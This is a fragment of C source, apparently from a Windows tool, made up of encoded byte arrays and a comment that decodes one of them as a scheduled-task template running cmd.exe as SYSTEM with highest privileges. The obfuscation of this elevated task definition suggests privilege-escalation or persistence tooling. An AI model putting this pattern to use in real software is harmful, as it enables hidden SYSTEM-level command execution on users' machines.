0xBA, 0xA7, 0x28, 0x9E, 0x54,\n\t0x7A, 0x9A, 0xE9, 0xB2, 0xA7, 0x23, 0x9E, 0x7B, 0x7A, 0x9D, 0xE9, 0xBF, 0xA7, 0x2A, 0x9E, 0x53,\n\t0x7A, 0x95, 0xE9, 0xBE, 0xA7, 0x2A, 0x9E, 0x3D, 0x7A, 0x97, 0xE9, 0xA9, 0xA7, 0x25, 0x9E, 0x5B,\n\t0x7A, 0x83, 0xE9, 0xA2, 0xA7, 0x28, 0x9E, 0x53, 0x7A, 0xDA, 0xE9, 0xB7, 0xA7, 0x23, 0x9E, 0x51,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x7B, 0x9E, 0x35, 0x7A, 0xF5, 0xE9, 0x83, 0xA7, 0x3D, 0x9E, 0x52,\n\t0x7A, 0x90, 0xE9, 0xA6, 0xA7, 0x2C, 0x9E, 0x49, 0x7A, 0xA2, 0xE9, 0xB6, 0xA7, 0x3D, 0x9E, 0x4E,\n\t0x7A, 0x9D, 0xE9, 0xBC, 0xA7, 0x21, 0x9E, 0x3D, 0x7A, 0xC4, 0xE9, 0xFD, 0xA7, 0x7F, 0x9E, 0x13,\n\t0x7A, 0xC4, 0xE9, 0xFD, 0xA7, 0x7F, 0x9E, 0x3D, 0x7A, 0xCC, 0xE9, 0xDB, 0xA7, 0x4E, 0x9E, 0x7C,\n\t0x7A, 0x87, 0xE9, 0xA0, 0xA7, 0x2A, 0x9E, 0x50, 0x7A, 0x96, 0xE9, 0xBF, 0xA7, 0x36, 0x9E, 0x1D,\n\t0x7A, 0xA2, 0xE9, 0xB6, 0xA7, 0x3D, 0x9E, 0x4E, 0x7A, 0x9D, 0xE9, 0xBC, 0xA7, 0x21, 0x9E, 0x3D,\n\t0x7A, 0xC4, 0xE9, 0xFD, 0xA7, 0x7F, 0x9E, 0x13, 0x7A, 0xC4, 0xE9, 0xFD, 0xA7, 0x7F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0xBE, 0x3D,\n\t0x7A, 0xF8, 0xE9, 0xD3, 0xA7, 0xFF, 0xAD, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4B, 0xC9, 0x3D,\n\t0x7A, 0xF4, 0xE2, 0x80, 0xDE, 0x3C, 0xEA, 0x58, 0x17, 0xDA, 0xAE, 0xA6, 0xCE, 0x2B, 0x95, 0x3D,\n\t0x7A, 0xF4, 0xEB, 0x8C, 0xC6, 0x4D, 0xC1, 0x5F, 0x78, 0xAB, 0x8A, 0xD1, 0xF8, 0x2B, 0x9C, 0x62,\n\t0x1F, 0xF6, 0xB6, 0xB5, 0xA5, 0x10, 0xF9, 0x3F, 0x25, 0x9C, 0xEB, 0x8C, 0xCE, 0x4D, 0xC1, 0x57,\n\t0x78, 0xAB, 0x82, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x96, 0x3A,\n\t0x7D, 0xF6, 0xEB, 0xD1, 0xA5, 0x4D, 0x9C, 0x3F, 0x78, 0xE7, 0xFA, 0x01, 0xD3, 0xA1, 0xB4, 0xEC,\n\t0x6B, 0x7F, 0x12, 0xD3, 0x07, 0x86, 0x91, 0x1B, 0x8D, 0xFF, 0xE2\n};\n\n/*\n* g_encodedTaskParamBegin/g_encodedTaskParamEnd\n\nReference = L\"\\\n\\\n \\\n\tTest Task\\\n \\\n \\\n \\\n\t\\\n\t SYSTEM\\\n\t HighestAvailable\\\n\t\\\n \\\n \\\n\tIgnoreNew\\\n\ttrue\\\n\ttrue\\\n\ttrue\\\n\tfalse\\\n\tfalse\\\n\t\\\n\t PT10M\\\n\t PT1H\\\n\t true\\\n\t false\\\n\t\\\n\ttrue\\\n\ttrue\\\n\tfalse\\\n\tfalse\\\n\tfalse\\\n\tfalse\\\n\tPT72H\\\n\t7\\\n \\\n \\\n\t\\\n\t cmd.exe\\\n\t\\\n \\\n\";\n\ng_encodedTaskParamBegin = L\"\\\n\\\n\\\nTest Task\\\n\\\n\\\n\\\n\\\nSYSTEM\\\nHighestAvailable\\\n\\\n\\\n\\\nIgnoreNew\\\ntrue\\\ntrue\\\ntrue\\\nfalse\\\nfalse\\\n\\\nPT10M\\\nPT1H\\\ntrue\\\nfalse\\\n\\\ntrue\\\ntrue\\\nfalse\\\nfalse\\\nfalse\\\nfalse\\\nPT72H\\\n7\\\n\\\n\\\n\\\n\";\n\ng_encodedTaskParamEnd = L\"\\\n\\\n\\\n\";\n\n*/\n\nstatic const unsigned char g_encodedTaskParamBegin[2308] = {\n\t0x5D, 0xC2, 0xBB, 0x09, 0x6A, 0x24, 0x25, 0x90, 0x4C, 0x40, 0xA1, 0x03, 0x71, 0x0E, 0x79, 0x38,\n\t0x02, 0xE0, 0xB2, 0x83, 0x6E, 0x0E, 0x72, 0x3A, 0x1A, 0xE8, 0xEC, 0xA3, 0x64, 0x8C, 0x29, 0x30,\n\t0x4F, 0xC2, 0xB4, 0x09, 0x30, 0x24, 0x68, 0x90, 0x45, 0x40, 0xEF, 0x03, 0x64, 0x0E, 0x73, 0x38,\n\t0x14, 0xE0, 0xA8, 0x83, 0x69, 0x0E, 0x7A, 0x3A, 0x49, 0xE8, 0xF3, 0xA3, 0x13, 0x8C, 0x4C, 0x30,\n\t0x27, 0xC2, 0xA9, 0x09, 0x23, 0x24, 0x7E, 0x90, 0x02, 0x40, 0xBE, 0x03, 0x39, 0x0E, 0x20, 0x38,\n\t0x24, 0xE0, 0xA0, 0x83, 0x74, 0x0E, 0x76, 0x3A, 0x54, 0xE8, 0xA7, 0xA3, 0x23, 0x8C, 0x6A, 0x30,\n\t0x12, 0xC2, 0xED, 0x09, 0x7D, 0x24, 0x26, 0x90, 0x1D, 0x40, 0xA3, 0x03, 0x36, 0x0E, 0x32, 0x38,\n\t0x43, 0xE0, 0xE3, 0x83, 0x27, 0x0E, 0x65, 0x3A, 0x19, 0xE8, 0xBD, 0xA3, 0x28, 0x8C, 0x6B, 0x30,\n\t0x5C, 0xC2, 0xA6, 0x09, 0x7A, 0x24, 0x3C, 0x90, 0x54, 0x40, 0xF1, 0x03, 0x3D, 0x0E, 0x33, 0x38,\n\t0x5F, 0xE0, 0xB2, 0x83, 0x64, 0x0E, 0x75, 0x3A, 0x11, 0xE8, 0xBC, 0xA3, 0x27, 0x8C, 0x6B, 0x30,\n\t0x4F, 0xC2, 0xE9, 0x09, 0x7B, 0x24, 0x2B, 0x90, 0x52, 0x40, 0xEE, 0x03, 0x74, 0x0E, 0x73, 0x38,\n\t0x16, 0xE0, 0xB5, 0x83, 0x29, 0x0E, 0x7E, 0x3A, 0x1B, 0xE8, 0xBC, 0xA3, 0x69, 0x8C, 0x6F, 0x30,\n\t0x08, 0xC2, 0xEA, 0x09, 0x76, 0x24, 0x27, 0x90, 0x57, 0x40, 0xF2, 0x03, 0x28, 0x0E, 0x2E, 0x38,\n\t0x40, 0xE0, 0xF1, 0x83, 0x33, 0x0E, 0x32, 0x3A, 0x44, 0xE8, 0xE3, 0xA3, 0x69, 0x8C, 0x75, 0x30,\n\t0x08, 0xC2, 0xF0, 0x09, 0x3D, 0x24, 0x3C, 0x90, 0x41, 0x40, 0xF2, 0x03, 0x6C, 0x0E, 0x3E, 0x38,\n\t0x4E, 0xE0, 0xFD, 0x83, 0x55, 0x0E, 0x78, 0x3A, 0x13, 0xE8, 0xB8, 0xA3, 0x35, 0x8C, 0x6C, 0x30,\n\t0x13, 0xC2, 0xE5, 0x09, 0x66, 0x24, 0x21, 0x90, 0x4F, 0x40, 0xEF, 0x03, 0x4E, 0x0E, 0x72, 0x38,\n\t0x16, 0xE0, 0xAE, 0x83, 0x39, 0x0E, 0x21, 0x3A, 0x30, 0xE8, 0xB4, 0xA3, 0x35, 0x8C, 0x7B, 0x30,\n\t0x13, 0xC2, 0xED, 0x09, 0x62, 0x24, 0x3C, 0x90, 0x49, 0x40, 0xEE, 0x03, 0x69, 0x0E, 0x22, 0x38,\n\t0x24, 0xE0, 0xA4, 0x83, 0x74, 0x0E, 0x69, 0x3A, 0x54, 0xE8, 0x85, 0xA3, 0x27, 0x8C, 0x6B, 0x30,\n\t0x0A, 0xC2, 0xB8, 0x09, 0x3D, 0x24, 0x0C, 0x90, 0x45, 0x40, 0xF2, 0x03, 0x64, 0x0E, 0x6E, 0x38,\n\t0x19, 0xE0, 0xB1, 0x83, 0x73, 0x0E, 0x74, 0x3A, 0x1B, 0xE8, 0xBF, 0xA3, 0x78, 0x8C, 0x24, 0x30,\n\t0x4E, 0xC2, 0xD6, 0x09, 0x77, 0x24, 0x2F, 0x90, 0x49, 0x40, 0xF2, 0x03, 0x73, 0x0E, 0x6E, 0x38,\n\t0x11, 0xE0, 0xB5, 0x83, 0x6E, 0x0E, 0x72, 0x3A, 0x1A, 0xE8, 0x98, 0xA3, 0x28, 0x8C, 0x7E, 0x30,\n\t0x0E, 0xC2, 0xBA, 0x09, 0x2E, 0x24, 0x1C, 0x90, 0x52, 0x40, 0xE8, 0x03, 0x60, 0x0E, 0x7B, 0x38,\n\t0x15, 0xE0, 0xB3, 0x83, 0x74, 0x0E, 0x3D, 0x3A, 0x5B, 0xE8, 0xEF, 0xA3, 0x7A, 0x8C, 0x48, 0x30,\n\t0x13, 0xC2, 0xED, 0x09, 0x7C, 0x24, 0x2B, 0x90, 0x49, 0x40, 0xF1, 0x03, 0x66, 0x0E, 0x70, 0x38,\n\t0x03, 0xE0, 0xFF, 0x83, 0x3B, 0x0E, 0x4D, 0x3A, 0x06, 0xE8, 0xB8, 0xA3, 0x28, 0x8C, 0x7B, 0x30,\n\t0x08, 0xC2, 0xF4, 0x09, 0x73, 0x24, 0x24, 0x90, 0x00, 0x40, 0xE8, 0x03, 0x63, 0x0E, 0x21, 0x38,\n\t0x52, 0xE0, 0x80, 0x83, 0x72, 0x0E, 0x69, 0x3A, 0x1C, 0xE8, 0xBE, 0xA3, 0x34, 0x8C, 0x3A, 0x30,\n\t0x5F, 0xC2, 0xB8, 0x09, 0x47, 0x24, 0x3B, 0x90, 0x45, 0x40, 0xF3, 0x03, 0x4E, 0x0E, 0x78, 0x38,\n\t0x4E, 0xE0, 0x92, 0x83, 0x5E, 0x0E, 0x4E, 0x3A, 0x20, 0xE8, 0x94, 0xA3, 0x0B, 0x8C, 0x24, 0x30,\n\t0x4E, 0xC2, 0xD1, 0x09, 0x61, 0x24, 0x2D, 0x90, 0x52, 0x40, 0xC8, 0x03, 0x63, 0x0E, 0x22, 0x38,\n\t0x4C, 0xE0, 0x93, 0x83, 0x72, 0x0E, 0x73, 0x3A, 0x38, 0xE8, 0xB4, 0xA3, 0x30, 0x8C, 0x7D, 0x30,\n\t0x0D, 0xC2, 0xBA, 0x09, 0x5A, 0x24, 0x21, 0x90, 0x47, 0x40, 0xE9, 0x03, 0x62, 0x0E, 0x6F, 0x38,\n\t0x04, 0xE0, 0x80, 0x83, 0x71, 0x0E, 0x7C, 0x3A, 0x1D, 0xE8, 0xBD, 0xA3, 0x27, 0x8C, 0x7A, 0x30,\n\t0x0D, 0xC2, 0xE1, 0x09, 0x2E, 0x24, 0x67, 0x90, 0x72, 0x40, 0xF4, 0x03, 0x69, 0x0E, 0x50, 0x38,\n\t0x15, 0xE0, 0xB7, 0x83, 0x62, 0x0E, 0x71, 0x3A, 0x4A, 0xE8, 0xED, 0xA3, 0x69, 0x8C, 0x48, 0x30,\n\t0x13, 0xC2, 0xED, 0x09, 0x7C, 0x24, 0x2B, 0x90, 0x49, 0x40, 0xF1, 0x03, 0x66, 0x0E, 0x70, 0x38,\n\t0x4E, 0xE0, 0xFD, 0x83, 0x28, 0x0E, 0x4D, 0x3A, 0x06, 0xE8, 0xB8, 0xA3, 0x28, 0x8C, 0x7B, 0x30,\n\t0x08, 0xC2, 0xF4, 0x09, 0x73, 0x24, 0x24, 0x90, 0x53, 0x40, 0xBF, 0x03, 0x3B, 0x0E, 0x4F, 0x38,\n\t0x15, 0xE0, 0xB5, 0x83, 0x73, 0x0E, 0x74, 0x3A, 0x1A, 0xE8, 0xB6, 0xA3, 0x35, 0x8C, 0x26, 0x30,\n\t0x5D, 0xC2, 0xC9, 0x09, 0x67, 0x24, 0x24, 0x90, 0x54, 0x40, 0xE8, 0x03, 0x77, 0x0E, 0x70, 0x38,\n\t0x15, 0xE0, 0x88, 0x83, 0x69, 0x0E, 0x6E, 0x3A, 0x00, 0xE8, 0xB0, 0xA3, 0x28, 0x8C, 0x7B, 0x30,\n\t0x04, 0xC2, 0xF7, 0x09, 0x42, 0x24, 0x27, 0x90, 0x4C, 0x40, 0xE8, 0x03, 0x64, 0x0E, 0x65, 0x38,\n\t0x4E, 0xE0, 0x88, 0x83, 0x60, 0x0E, 0x73, 0x3A, 0x1B, 0xE8, 0xA3, 0xA3, 0x23, 0x8C, 0x56, 0x30,\n\t0x04, 0xC2, 0xF3, 0x09, 0x2E, 0x24, 0x67, 0x90, 0x6D, 0x40, 0xF4, 0x03, 0x6B, 0x0E, 0x68, 0x38,\n\t0x19, 0xE0, 0xB1, 0x83, 0x6B, 0x0E, 0x78, 0x3A, 0x3D, 0xE8, 0xBF, 0xA3, 0x35, 0x8C, 0x6C, 0x30,\n\t0x00, 0xC2, 0xEA, 0x09, 0x71, 0x24, 0x2D, 0x90, 0x53, 0x40, 0xD1, 0x03, 0x68, 0x0E, 0x70, 0x38,\n\t0x19, 0xE0, 0xA2, 0x83, 0x7E, 0x0E, 0x23, 0x3A, 0x48, 0xE8, 0x95, 0xA3, 0x2F, 0x8C, 0x6B, 0x30,\n\t0x00, 0xC2, 0xE8, 0x09, 0x7E, 0x24, 0x27, 0x90, 0x57, 0x40, 0xD2, 0x03, 0x73, 0x0E, 0x7D, 0x38,\n\t0x02, 0xE0, 0xB5, 0x83, 0x4E, 0x0E, 0x7B, 0x3A, 0x3B, 0xE8, 0xBF, 0xA3, 0x04, 0x8C, 0x79, 0x30,\n\t0x15, 0xC2, 0xF0, 0x09, 0x77, 0x24, 0x3A, 0x90, 0x49, 0x40, 0xE4, 0x03, 0x74, 0x0E, 0x22, 0x38,\n\t0x04, 0xE0, 0xB3, 0x83, 0x72, 0x0E, 0x78, 0x3A, 0x48, 0xE8, 0xFE, 0xA3, 0x02, 0x8C, 0x71, 0x30,\n\t0x12, 0xC2, 0xE5, 0x09, 0x7E, 0x24, 0x24, 0x90, 0x4F, 0x40, 0xF6, 0x03, 0x54, 0x0E, 0x68, 0x38,\n\t0x11, 0xE0, 0xB3, 0x83, 0x73, 0x0E, 0x54, 0x3A, 0x12, 0xE8, 0x9E, 0xA3, 0x28, 0x8C, 0x5A, 0x30,\n\t0x00, 0xC2, 0xF0, 0x09, 0x66, 0x24, 0x2D, 0x90, 0x52, 0x40, 0xE8, 0x03, 0x62, 0x0E, 0x6F, 0x38,\n\t0x4E, 0xE0, 0xFD, 0x83, 0x54, 0x0E, 0x69, 0x3A, 0x1B, 0xE8, 0xA1, 0xA3, 0x0F, 0x8C, 0x7E, 0x30,\n\t0x26, 0xC2, 0xEB, 0x09, 0x7B, 0x24, 0x26, 0x90, 0x47, 0x40, 0xCE, 0x03, 0x69, 0x0E, 0x5E, 0x38,\n\t0x11, 0xE0, 0xB5, 0x83, 0x73, 0x0E, 0x78, 0x3A, 0x06, 0xE8, 0xB8, 0xA3, 0x23, 0x8C, 0x6B, 0x30,\n\t0x5F, 0xC2, 0xF0, 0x09, 0x60, 0x24, 0x3D, 0x90, 0x45, 0x40, 0xBD, 0x03, 0x28, 0x0E, 0x4F, 0x38,\n\t0x04, 0xE0, 0xAE, 0x83, 0x77, 0x0E, 0x54, 0x3A, 0x12, 0xE8, 0x96, 0xA3, 0x29, 0x8C, 0x71, 0x30,\n\t0x0F, 0xC2, 0xE3, 0x09, 0x5D, 0x24, 0x26, 0x90, 0x62, 0x40, 0xE0, 0x03, 0x73, 0x0E, 0x68, 0x38,\n\t0x15, 0xE0, 0xB3, 0x83, 0x6E, 0x0E, 0x78, 0x3A, 0x07, 0xE8, 0xEF, 0xA3, 0x7A, 0x8C, 0x59, 0x30,\n\t0x0D, 0xC2, 0xE8, 0x09, 0x7D, 0x24, 0x3F, 0x90, 0x68, 0x40, 0xE0, 0x03, 0x75, 0x0E, 0x78, 0x38,\n\t0x24, 0xE0, 0xA4, 0x83, 0x75, 0x0E, 0x70, 0x3A, 0x1D, 0xE8, 0xBF, 0xA3, 0x27, 0x8C, 0x6C, 0x30,\n\t0x04, 0xC2, 0xBA, 0x09, 0x66, 0x24, 0x3A, 0x90, 0x55, 0x40, 0xE4, 0x03, 0x3B, 0x0E, 0x33, 0x38,\n\t0x31, 0xE0, 0xAD, 0x83, 0x6B, 0x0E, 0x72, 0x3A, 0x03, 0xE8, 0x99, 0xA3, 0x27, 0x8C, 0x6A, 0x30,\n\t0x05, 0xC2, 0xD0, 0x09, 0x77, 0x24, 0x3A, 0x90, 0x4D, 0x40, 0xE8, 0x03, 0x69, 0x0E, 0x7D, 0x38,\n\t0x04, 0xE0, 0xA4, 0x83, 0x39, 0x0E, 0x21, 0x3A, 0x27, 0xE8, 0xA5, 0xA3, 0x27, 0x8C, 0x6A, 0x30,\n\t0x15, 0xC2, 0xD3, 0x09, 0x7A, 0x24, 0x2D, 0x90, 0x4E, 0x40, 0xC0, 0x03, 0x71, 0x0E, 0x7D, 0x38,\n\t0x19, 0xE0, 0xAD, 0x83, 0x66, 0x0E, 0x7F, 0x3A, 0x18, 0xE8, 0xB4, 0xA3, 0x78, 0x8C, 0x7E, 0x30,\n\t0x00, 0xC2, 0xE8, 0x09, 0x61, 0x24, 0x2D, 0x90, 0x1C, 0x40, 0xAE, 0x03, 0x54, 0x0E, 0x68, 0x38,\n\t0x11, 0xE0, 0xB3, 0x83, 0x73, 0x0E, 0x4A, 0x3A, 0x1C, 0xE8, 0xB4, 0xA3, 0x28, 0x8C, 0x59, 0x30,\n\t0x17, 0xC2, 0xE5, 0x09, 0x7B, 0x24, 0x24, 0x90, 0x41, 0x40, 0xE3, 0x03, 0x6B, 0x0E, 0x79, 0x38,\n\t0x4E, 0xE0, 0xFD, 0x83, 0x55, 0x0E, 0x68, 0x3A, 0x1A, 0xE8, 0x9E, 0xA3, 0x28, 0x8C, 0x74, 0x30,\n\t0x18, 0xC2, 0xCD, 0x09, 0x74, 0x24, 0x06, 0x90, 0x45, 0x40, 0xF5, 0x03, 0x70, 0x0E, 0x73, 0x38,\n\t0x02, 0xE0, 0xAA, 0x83, 0x46, 0x0E, 0x6B, 0x3A, 0x15, 0xE8, 0xB8, 0xA3, 0x2A, 0x8C, 0x79, 0x30,\n\t0x03, 0xC2, 0xE8, 0x09, 0x77, 0x24, 0x76, 0x90, 0x46, 0x40, 0xE0, 0x03, 0x6B, 0x0E, 0x6F, 0x38,\n\t0x15, 0xE0, 0xFD, 0x83, 0x28, 0x0E, 0x4F, 0x3A, 0x01, 0xE8, 0xBF, 0xA3, 0x09, 0x8C, 0x76, 0x30,\n\t0x0D, 0xC2, 0xFD, 0x09, 0x5B, 0x24, 0x2E, 0x90, 0x6E, 0x40, 0xE4, 0x03, 0x73, 0x0E, 0x6B, 0x38,\n\t0x1F, 0xE0, 0xB3, 0x83, 0x6C, 0x0E, 0x5C, 0x3A, 0x02, 0xE8, 0xB0, 0xA3, 0x2F, 0x8C, 0x74, 